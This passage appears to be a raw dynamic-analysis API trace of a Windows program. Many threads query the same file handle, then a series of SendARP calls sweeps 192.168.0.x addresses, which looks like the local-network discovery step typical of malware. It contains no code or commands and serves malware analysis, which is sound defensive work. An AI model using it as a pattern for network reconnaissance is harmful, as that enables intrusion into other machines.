FileInformation=0x210e20) returned 0x0 Thread: id = 2159 os_tid = 0xb24 [0166.604] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fcf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fcf8, FileInformation=0x210e20) returned 0x0 Thread: id = 2160 os_tid = 0x878 [0166.606] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369f890, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369f890, FileInformation=0x210e20) returned 0x0 Thread: id = 2161 os_tid = 0xb1c [0166.608] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363ff18, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363ff18, FileInformation=0x210e20) returned 0x0 Thread: id = 2162 os_tid = 0xb08 [0166.610] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x363f7f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x363f7f0, FileInformation=0x210e20) returned 0x0 Thread: id = 2163 os_tid = 0x4fc [0166.612] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36df938, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36df938, FileInformation=0x210e20) returned 0x0 Thread: id = 2164 os_tid = 0x4dc [0166.614] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35bf8c0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35bf8c0, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2165 os_tid = 0x43c [0166.615] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffbc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffbc8, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2166 os_tid = 0x1c4 [0166.622] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff920, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff920, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2167 os_tid = 0xbec [0166.624] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fc88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fc88, FileInformation=0x210e20) returned 0x0 Thread: id = 2168 os_tid = 0xb48 [0166.626] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df818, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df818, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2169 os_tid = 0x5bc [0166.628] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35ffd88, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35ffd88, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2170 os_tid = 0x6b8 [0166.629] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfaa0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfaa0, FileInformation=0x210e20) returned 0x0 Thread: id = 2171 os_tid = 0x2dc [0166.631] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35df9e8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35df9e8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2172 os_tid = 0x158 [0166.637] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfd40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfd40, FileInformation=0x210e20) returned 0x0 Thread: id = 2173 os_tid = 0x6cc [0166.639] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373fb08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373fb08, FileInformation=0x210e20) returned 0x0 Thread: id = 2174 os_tid = 0x694 [0166.641] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x373f998, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x373f998, FileInformation=0x210e20) returned 0x0 Thread: id = 2175 os_tid = 0x6d8 [0166.643] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f900, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f900, FileInformation=0x210e20) returned 0x0 Thread: id = 2176 os_tid = 0x87c [0166.645] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f860, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f860, FileInformation=0x210e20) returned 0x0 Thread: id = 2177 os_tid = 0xb88 [0166.648] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfcf0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfcf0, FileInformation=0x210e20) returned 0x0 Thread: id = 2178 os_tid = 0xb8c [0166.650] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fe20, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fe20, FileInformation=0x210e20) returned 0x0 Thread: id = 2179 os_tid = 0x700 [0166.652] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfc68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfc68, FileInformation=0x210e20) returned 0x0 Thread: id = 2180 os_tid = 0x6f0 [0166.654] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fcc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fcc8, FileInformation=0x210e20) returned 0x0 Thread: id = 2181 os_tid = 0x130 [0166.656] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fc58, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fc58, FileInformation=0x210e20) returned 0x0 Thread: id = 2182 os_tid = 0x754 [0166.658] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fd80, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fd80, FileInformation=0x210e20) returned 0x0 Thread: id = 2183 os_tid = 0x72c [0166.661] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367f7a8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367f7a8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2184 os_tid = 0x748 [0166.663] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fe00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fe00, FileInformation=0x210e20) returned 0x0 Thread: id = 2185 os_tid = 0x928 [0166.665] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfd38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfd38, FileInformation=0x210e20) returned 0x0 Thread: id = 2186 os_tid = 0xcc [0166.667] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfde0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfde0, FileInformation=0x210e20) returned 0x0 Thread: id = 2187 os_tid = 0xd0 [0166.669] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fd00, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fd00, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2188 os_tid = 0xd4 [0166.672] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa28, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa28, FileInformation=0x210e20) returned 0xc0000010 Thread: id = 2189 os_tid = 0xd8 [0166.674] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36bfd70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36bfd70, FileInformation=0x210e20) returned 0x0 Thread: id = 2190 os_tid = 0xdc [0166.676] NtQueryInformationFile (FileHandle=0x194, IoStatusBlock=0x35bfd68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9) Thread: id = 2191 os_tid = 0xe0 [0166.930] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367fbd8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367fbd8, FileInformation=0x210e20) returned 0x0 Thread: id = 2192 os_tid = 0xe4 [0166.933] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fa38, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fa38, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2193 os_tid = 0xe8 [0166.934] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x367feb0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x367feb0, FileInformation=0x210e20) returned 0x0 Thread: id = 2194 os_tid = 0xec [0166.936] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36dfe08, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36dfe08, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2195 os_tid = 0x9d8 [0166.944] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365fdc8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365fdc8, FileInformation=0x210e20) returned 0x0 Thread: id = 2196 os_tid = 0x898 [0166.947] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dfcd0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dfcd0, FileInformation=0x210e20) returned 0x0 Thread: id = 2197 os_tid = 0x48c [0166.949] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371fc90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371fc90, FileInformation=0x210e20) returned 0x0 Thread: id = 2198 os_tid = 0x6a4 [0166.952] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x375fdf8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x375fdf8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2199 os_tid = 0x20c [0166.955] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x369fd90, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x369fd90, FileInformation=0x210e20) returned 0x0 Thread: id = 2200 os_tid = 0x630 [0166.957] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x361fb68, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x361fb68, FileInformation=0x210e20) returned 0x0 Thread: id = 2201 os_tid = 0x5e4 [0166.959] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x357fad8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x357fad8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2202 os_tid = 0xb28 [0166.961] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x371f7c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x371f7c8, FileInformation=0x210e20) returned 0x0 Thread: id = 2203 os_tid = 0xb20 [0166.963] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x35dff40, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x35dff40, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2204 os_tid = 0x704 [0166.966] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x365f7f0, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x365f7f0, FileInformation=0x210e20) returned 0x0 Thread: id = 2205 os_tid = 0x568 [0166.968] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x36ff8c8, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x36ff8c8, FileInformation=0x210e20) returned 0xc0000003 Thread: id = 2206 os_tid = 0x5ac [0166.970] NtQueryInformationFile (in: FileHandle=0x194, IoStatusBlock=0x359fa70, FileInformation=0x210e20, Length=0x10000, FileInformationClass=0x9 | out: IoStatusBlock=0x359fa70, FileInformation=0x210e20) returned 0x0 Thread: id = 2207 os_tid = 0x888 [0169.632] SendARP (DestIP=0xa8c0, SrcIP=0x0, pMacAddr=0x282f8b2, PhyAddrLen=0x282f8b8) Thread: id = 2208 os_tid = 0x544 [0169.633] SendARP (in: DestIP=0x100a8c0, SrcIP=0x0, pMacAddr=0x2aefd22, PhyAddrLen=0x2aefd28 | out: pMacAddr=0x2aefd22, PhyAddrLen=0x2aefd28) returned 0x0 [0169.846] gethostbyaddr (addr="192.168.0.1", len=4, type=2) Thread: id = 2209 os_tid = 0x76c [0169.633] SendARP (DestIP=0x200a8c0, SrcIP=0x0, pMacAddr=0x2cbf92a, PhyAddrLen=0x2cbf930) Thread: id = 2210 os_tid = 0xa9c [0169.634] SendARP (DestIP=0x300a8c0, SrcIP=0x0, pMacAddr=0x29cfb2a, PhyAddrLen=0x29cfb30) Thread: id = 2211 os_tid = 0x114 [0169.634] SendARP (DestIP=0x400a8c0, SrcIP=0x0, pMacAddr=0x2e1ff62, PhyAddrLen=0x2e1ff68) Thread: id = 2212 os_tid = 0x5b8 [0169.634] SendARP (DestIP=0x500a8c0, SrcIP=0x0, pMacAddr=0x2f7f83a, PhyAddrLen=0x2f7f840) Thread: id = 2213 os_tid = 0x814 [0169.635] SendARP (DestIP=0x600a8c0, SrcIP=0x0, pMacAddr=0x38aff5a, PhyAddrLen=0x38aff60) Thread: id = 2214 os_tid = 0x834 [0169.635] SendARP (DestIP=0x700a8c0, SrcIP=0x0, pMacAddr=0x37af8b2, PhyAddrLen=0x37af8b8) Thread: id = 2215 os_tid = 0x884 [0169.635] SendARP (DestIP=0x800a8c0, SrcIP=0x0, pMacAddr=0x31efe82, PhyAddrLen=0x31efe88) Thread: id = 2216 os_tid = 0x5d4 [0169.636] SendARP (DestIP=0x900a8c0, SrcIP=0x0, pMacAddr=0x39cfa5a, PhyAddrLen=0x39cfa60) Thread: id = 2217 os_tid = 0x340 [0169.636] SendARP (DestIP=0xa00a8c0, SrcIP=0x0, pMacAddr=0x3bcfa5a, PhyAddrLen=0x3bcfa60) Thread: id = 2218 os_tid = 0x810 [0169.637] SendARP (DestIP=0xb00a8c0, SrcIP=0x0, pMacAddr=0x3ddfa82, PhyAddrLen=0x3ddfa88) Thread: id = 2219 os_tid = 0x830 [0169.637] SendARP (DestIP=0xc00a8c0, SrcIP=0x0, pMacAddr=0x3eef8ba, PhyAddrLen=0x3eef8c0) Thread: id = 2220 os_tid = 0x880 [0169.638] SendARP (DestIP=0xd00a8c0, SrcIP=0x0, pMacAddr=0x346f8e2, PhyAddrLen=0x346f8e8) Thread: id = 2221 os_tid = 0xae4 [0169.638] SendARP (DestIP=0xe00a8c0, SrcIP=0x0, pMacAddr=0x408fe4a, PhyAddrLen=0x408fe50) Thread: id = 2222 os_tid = 0x570 [0169.638] SendARP (DestIP=0xf00a8c0, SrcIP=0x0, pMacAddr=0x428fd3a, PhyAddrLen=0x428fd40) Thread: id = 2223 os_tid = 0xb40 [0169.639] SendARP (DestIP=0x1000a8c0, SrcIP=0x0, pMacAddr=0x44ffd3a, PhyAddrLen=0x44ffd40) Thread: id = 2224 os_tid = 0x5f4 [0169.639] SendARP (DestIP=0x1100a8c0, SrcIP=0x0, pMacAddr=0x466fd2a, PhyAddrLen=0x466fd30) Thread: id = 2225 os_tid = 0xbb8 [0169.639] SendARP (DestIP=0x1200a8c0, SrcIP=0x0, pMacAddr=0x47ff982, PhyAddrLen=0x47ff988) Thread: id = 2226 os_tid = 0x598 [0169.640] SendARP (DestIP=0x1300a8c0, SrcIP=0x0, pMacAddr=0x4a0fd7a, PhyAddrLen=0x4a0fd80) Thread: id = 2227 os_tid = 0x4e4 [0169.641] SendARP (DestIP=0x1400a8c0, SrcIP=0x0, pMacAddr=0x4c1fee2, PhyAddrLen=0x4c1fee8) Thread: id = 2228 os_tid = 0xbfc [0169.642] SendARP (DestIP=0x1500a8c0, SrcIP=0x0, pMacAddr=0x4defb0a, PhyAddrLen=0x4defb10) Thread: id = 2229 os_tid = 0x80c [0169.642] SendARP (DestIP=0x1600a8c0, SrcIP=0x0, pMacAddr=0x43af7fa, PhyAddrLen=0x43af800) Thread: id = 2230 os_tid = 0xbf8 [0169.643] SendARP (DestIP=0x1700a8c0, SrcIP=0x0, pMacAddr=0x508f872, PhyAddrLen=0x508f878) Thread: id = 2231 os_tid = 0x524 [0169.643] SendARP (DestIP=0x1800a8c0, SrcIP=0x0, pMacAddr=0x51ffd7a, PhyAddrLen=0x51ffd80) Thread: id = 2232 os_tid = 0x674 [0169.643] SendARP (DestIP=0x1900a8c0, SrcIP=0x0, pMacAddr=0x4eeff02, PhyAddrLen=0x4eeff08) Thread: id = 2233 os_tid = 0x4a0 [0169.644] SendARP (DestIP=0x1a00a8c0, SrcIP=0x0, pMacAddr=0x549fb1a, PhyAddrLen=0x549fb20) Thread: id = 2234 os_tid = 0x5d8 [0169.645] SendARP (DestIP=0x1b00a8c0, SrcIP=0x0, pMacAddr=0x562f95a, PhyAddrLen=0x562f960) Thread: id = 2235 os_tid = 0x69c [0169.645] SendARP (DestIP=0x1d00a8c0, SrcIP=0x0, pMacAddr=0x537fa62, PhyAddrLen=0x537fa68) Thread: id = 2236 os_tid = 0xb74 [0169.645] SendARP (DestIP=0x1e00a8c0, SrcIP=0x0, pMacAddr=0x586f7d2, PhyAddrLen=0x586f7d8) Thread: id = 2237 os_tid = 0x6a8 [0169.681] SendARP (DestIP=0x1f00a8c0, SrcIP=0x0, pMacAddr=0x5abfbe2, PhyAddrLen=0x5abfbe8) Thread: id = 2238 os_tid = 0xb68 [0169.681] SendARP (DestIP=0x2000a8c0, SrcIP=0x0, pMacAddr=0x572f892, PhyAddrLen=0x572f898) Thread: id = 2239 os_tid = 0x758 [0169.681] SendARP (DestIP=0x2100a8c0, SrcIP=0x0, pMacAddr=0x5d3ff42, PhyAddrLen=0x5d3ff48) Thread: id = 2240 os_tid = 0x3d4 [0169.682] SendARP (DestIP=0x2200a8c0, SrcIP=0x0, pMacAddr=0x598fb32, PhyAddrLen=0x598fb38) Thread: id = 2241 os_tid = 0x484 [0169.682] SendARP (DestIP=0x2300a8c0, SrcIP=0x0, pMacAddr=0x5c1fbb2, PhyAddrLen=0x5c1fbb8) Thread: id = 2242 os_tid = 0xb4c [0169.682] SendARP (DestIP=0x2400a8c0, SrcIP=0x0, pMacAddr=0x5e9f8b2, PhyAddrLen=0x5e9f8b8) Thread: id = 2243 os_tid = 0xa1c [0169.683] SendARP (DestIP=0x2500a8c0, SrcIP=0x0, pMacAddr=0x5fbfb12, PhyAddrLen=0x5fbfb18) Thread: id = 2244 os_tid = 0x2ac [0169.683] SendARP (DestIP=0x2600a8c0, SrcIP=0x0, pMacAddr=0x613fc62, PhyAddrLen=0x613fc68) Thread: id = 2245 os_tid = 0xa8c [0169.683] SendARP (DestIP=0x2700a8c0, SrcIP=0x0, pMacAddr=0x637fbca, PhyAddrLen=0x637fbd0) Thread: id = 2246 os_tid = 0x68c [0169.684] SendARP (DestIP=0x2800a8c0, SrcIP=0x0, pMacAddr=0x65cfa02, PhyAddrLen=0x65cfa08) Thread: id = 2247 os_tid = 0x388 [0169.684] SendARP (DestIP=0x2900a8c0, SrcIP=0x0, pMacAddr=0x675fee2, PhyAddrLen=0x675fee8) Thread: id = 2248 os_tid = 0xa50 [0169.684] SendARP (DestIP=0x2a00a8c0, SrcIP=0x0, pMacAddr=0x688fada, PhyAddrLen=0x688fae0) Thread: id = 2249 os_tid = 0x75c [0169.685] SendARP (DestIP=0x2b00a8c0, SrcIP=0x0, pMacAddr=0x69bfe7a, PhyAddrLen=0x69bfe80) Thread: id = 2250 os_tid = 0x240 [0169.685] SendARP (DestIP=0x2c00a8c0, SrcIP=0x0, pMacAddr=0x6b1f7b2, PhyAddrLen=0x6b1f7b8) Thread: id = 2251 os_tid = 0x320 [0169.686] SendARP (DestIP=0x2d00a8c0, SrcIP=0x0, pMacAddr=0x6d7fada, PhyAddrLen=0x6d7fae0) Thread: id = 2252 os_tid = 0x3b4 [0169.686] SendARP (DestIP=0x2e00a8c0, SrcIP=0x0, pMacAddr=0x6c1ff7a, PhyAddrLen=0x6c1ff80) Thread: id = 2253 os_tid = 0x760 [0169.690] SendARP (DestIP=0x2f00a8c0, SrcIP=0x0, pMacAddr=0x6fdfd6a, PhyAddrLen=0x6fdfd70) Thread: id = 2254 os_tid = 0xb00 [0169.691] SendARP (DestIP=0x3000a8c0, SrcIP=0x0, pMacAddr=0x724fdd2, PhyAddrLen=0x724fdd8) Thread: id = 2255 os_tid = 0x7fc [0169.691] SendARP (DestIP=0x3100a8c0, SrcIP=0x0, pMacAddr=0x73ffe4a, PhyAddrLen=0x73ffe50) Thread: id = 2256 os_tid = 0xb18 [0169.691] SendARP (DestIP=0x3200a8c0, SrcIP=0x0, pMacAddr=0x750f94a, PhyAddrLen=0x750f950) Thread: id = 2257 os_tid = 0xa68 [0169.692] SendARP (DestIP=0x3300a8c0, SrcIP=0x0, pMacAddr=0x76ff9a2, PhyAddrLen=0x76ff9a8) Thread: id = 2258 os_tid = 0x224 [0169.692] SendARP (DestIP=0x3400a8c0, SrcIP=0x0, pMacAddr=0x784fa0a, PhyAddrLen=0x784fa10) Thread: id = 2259 os_tid = 0x2c4 [0169.692] SendARP (DestIP=0x3500a8c0, SrcIP=0x0, pMacAddr=0x6e9fbc2, PhyAddrLen=0x6e9fbc8) Thread: id = 2260 os_tid = 0x24c [0169.693] SendARP (DestIP=0x3600a8c0, SrcIP=0x0, pMacAddr=0x712fc22, PhyAddrLen=0x712fc28) Thread: id = 2261 os_tid = 0x4e8 [0169.693] SendARP (DestIP=0x3700a8c0, SrcIP=0x0, pMacAddr=0x794feb2, PhyAddrLen=0x794feb8) Thread: id = 2262 os_tid = 0x220 [0169.693] SendARP (DestIP=0x3800a8c0, SrcIP=0x0, pMacAddr=0x7c2fd0a, PhyAddrLen=0x7c2fd10) Thread: id = 2263 os_tid = 0xb04 [0169.694] SendARP (DestIP=0x3900a8c0, SrcIP=0x0, pMacAddr=0x7b2fca2, PhyAddrLen=0x7b2fca8) Thread: id = 2264 os_tid = 0x180 [0169.694] SendARP (DestIP=0x3a00a8c0, SrcIP=0x0, pMacAddr=0x7eaf7a2, PhyAddrLen=0x7eaf7a8) Thread: id = 2265 os_tid = 0x53c [0169.694] SendARP (DestIP=0x3b00a8c0, SrcIP=0x0, pMacAddr=0x7fbfbaa, PhyAddrLen=0x7fbfbb0) Thread: id = 2266 os_tid = 0x5b4 [0169.695] SendARP (DestIP=0x3c00a8c0, SrcIP=0x0, pMacAddr=0x7d6fcba, PhyAddrLen=0x7d6fcc0) Thread: id = 2267 os_tid = 0x614 [0169.695] SendARP (DestIP=0x3d00a8c0, SrcIP=0x0, pMacAddr=0x81ffb82, PhyAddrLen=0x81ffb88) Thread: id = 2268 os_tid = 0x690 [0169.696] SendARP (DestIP=0x3e00a8c0, SrcIP=0x0, pMacAddr=0x83cf9ca, PhyAddrLen=0x83cf9d0) Thread: id = 2269 os_tid = 0x440 [0169.696] SendARP (DestIP=0x3f00a8c0, SrcIP=0x0, pMacAddr=0x864f7ca, PhyAddrLen=0x864f7d0) Thread: id = 2270 os_tid = 0x7d8 [0169.696] SendARP (DestIP=0x4000a8c0, SrcIP=0x0, pMacAddr=0x887ff62, PhyAddrLen=0x887ff68) Thread: id = 2271 os_tid = 0xa60 [0169.696] SendARP (DestIP=0x4100a8c0, SrcIP=0x0, pMacAddr=0x8a2feca, PhyAddrLen=0x8a2fed0) Thread: id = 2272 os_tid = 0xb24 [0169.697] SendARP (DestIP=0x4200a8c0, SrcIP=0x0, pMacAddr=0x8c3fbf2, PhyAddrLen=0x8c3fbf8) Thread: id = 2273 os_tid = 0x878 [0169.697] SendARP (DestIP=0x4300a8c0, SrcIP=0x0, pMacAddr=0x852f822, PhyAddrLen=0x852f828) Thread: id = 2274 os_tid = 0xb1c [0169.697] SendARP (DestIP=0x4400a8c0, SrcIP=0x0, pMacAddr=0x8e7f832, PhyAddrLen=0x8e7f838) Thread: id = 2275 os_tid = 0xb08 [0169.698] SendARP (DestIP=0x4500a8c0, SrcIP=0x0, pMacAddr=0x8b2f872, PhyAddrLen=0x8b2f878) Thread: id = 2276 os_tid = 0x4fc [0169.698] SendARP (DestIP=0x4600a8c0, SrcIP=0x0, pMacAddr=0x8faf9e2, PhyAddrLen=0x8faf9e8) Thread: id = 2277 os_tid = 0x4dc [0169.749] SendARP (DestIP=0x4700a8c0, SrcIP=0x0, pMacAddr=0x911f9ca, PhyAddrLen=0x911f9d0) Thread: id = 2278 os_tid = 0x43c [0169.749] SendARP (DestIP=0x4800a8c0, SrcIP=0x0, pMacAddr=0x922fdd2, PhyAddrLen=0x922fdd8) Thread: id = 2279 os_tid = 0x1c4 [0169.751] SendARP (DestIP=0x4900a8c0, SrcIP=0x0, pMacAddr=0x933f9a2, PhyAddrLen=0x933f9a8) Thread: id = 2280 os_tid = 0xbec [0169.752] SendARP (DestIP=0x4a00a8c0, SrcIP=0x0, pMacAddr=0x94efb22, PhyAddrLen=0x94efb28) Thread: id = 2281 os_tid = 0xb48 [0169.752] SendARP (DestIP=0x4b00a8c0, SrcIP=0x0, pMacAddr=0x971ff02, PhyAddrLen=0x971ff08) Thread: id = 2282 os_tid = 0x5bc [0169.753] SendARP (DestIP=0x4c00a8c0, SrcIP=0x0, pMacAddr=0x990f932, PhyAddrLen=0x990f938) Thread: id = 2283 os_tid = 0x6b8 [0169.753] SendARP (DestIP=0x4d00a8c0, SrcIP=0x0, pMacAddr=0x9b3fde2, PhyAddrLen=0x9b3fde8) Thread: id = 2284 os_tid = 0x2dc [0169.754] SendARP (DestIP=0x4e00a8c0, SrcIP=0x0, pMacAddr=0x8d3fb4a, PhyAddrLen=0x8d3fb50) Thread: id = 2285 os_tid = 0x158 [0169.755] SendARP (DestIP=0x4f00a8c0, SrcIP=0x0, pMacAddr=0x9d7f82a, PhyAddrLen=0x9d7f830) Thread: id = 2286 os_tid = 0x6cc [0169.757] SendARP (DestIP=0x5000a8c0, SrcIP=0x0, pMacAddr=0x9c3fbd2, PhyAddrLen=0x9c3fbd8) Thread: id = 2287 os_tid = 0x694 [0169.758] SendARP (DestIP=0x5100a8c0, SrcIP=0x0, pMacAddr=0xa01ff5a, PhyAddrLen=0xa01ff60) Thread: id = 2288 os_tid = 0x6d8 [0169.758] SendARP (DestIP=0x5200a8c0, SrcIP=0x0, pMacAddr=0xa1cf862, PhyAddrLen=0xa1cf868) Thread: id = 2289 os_tid = 0x87c [0169.758] SendARP (DestIP=0x5300a8c0, SrcIP=0x0, pMacAddr=0xa3bfa12, PhyAddrLen=0xa3bfa18) Thread: id = 2290 os_tid = 0xb88 [0169.759] SendARP (DestIP=0x5400a8c0, SrcIP=0x0, pMacAddr=0xa54fac2, PhyAddrLen=0xa54fac8) Thread: id = 2291 os_tid = 0xb8c [0169.759] SendARP (DestIP=0x5500a8c0, SrcIP=0x0, pMacAddr=0xa65fe22, PhyAddrLen=0xa65fe28) Thread: id = 2292 os_tid = 0x700 [0169.759] SendARP (DestIP=0x5600a8c0, SrcIP=0x0, pMacAddr=0x9a0fe9a, PhyAddrLen=0x9a0fea0) Thread: id = 2293 os_tid = 0x6f0 [0169.759] SendARP (DestIP=0x5700a8c0, SrcIP=0x0, pMacAddr=0xa7efa82, PhyAddrLen=0xa7efa88) Thread: id = 2294 os_tid = 0x130 [0169.760] SendARP (DestIP=0x5800a8c0, SrcIP=0x0, pMacAddr=0x9e7fa5a, PhyAddrLen=0x9e7fa60) Thread: id = 2295 os_tid = 0x754 [0169.761] SendARP (DestIP=0x5900a8c0, SrcIP=0x0, pMacAddr=0xa96fb22, PhyAddrLen=0xa96fb28) Thread: id = 2296 os_tid = 0x72c [0169.761] SendARP (DestIP=0x5a00a8c0, SrcIP=0x0, pMacAddr=0xab0f7fa, PhyAddrLen=0xab0f800) Thread: id = 2297 os_tid = 0x748 [0169.762] SendARP (DestIP=0x5b00a8c0, SrcIP=0x0, pMacAddr=0xaccfd42, PhyAddrLen=0xaccfd48) Thread: id = 2298 os_tid = 0x928 [0169.762] SendARP (DestIP=0x5c00a8c0, SrcIP=0x0, pMacAddr=0xaf4f9d2, PhyAddrLen=0xaf4f9d8) Thread: id = 2299 os_tid = 0xcc [0169.762] SendARP (DestIP=0x5d00a8c0, SrcIP=0x0, pMacAddr=0xae0fb1a, PhyAddrLen=0xae0fb20) Thread: id = 2300 os_tid = 0xd0 [0169.763] SendARP (DestIP=0x5e00a8c0, SrcIP=0x0, pMacAddr=0xb1af9a2, PhyAddrLen=0xb1af9a8) Thread: id = 2301 os_tid = 0xd4 [0169.764] 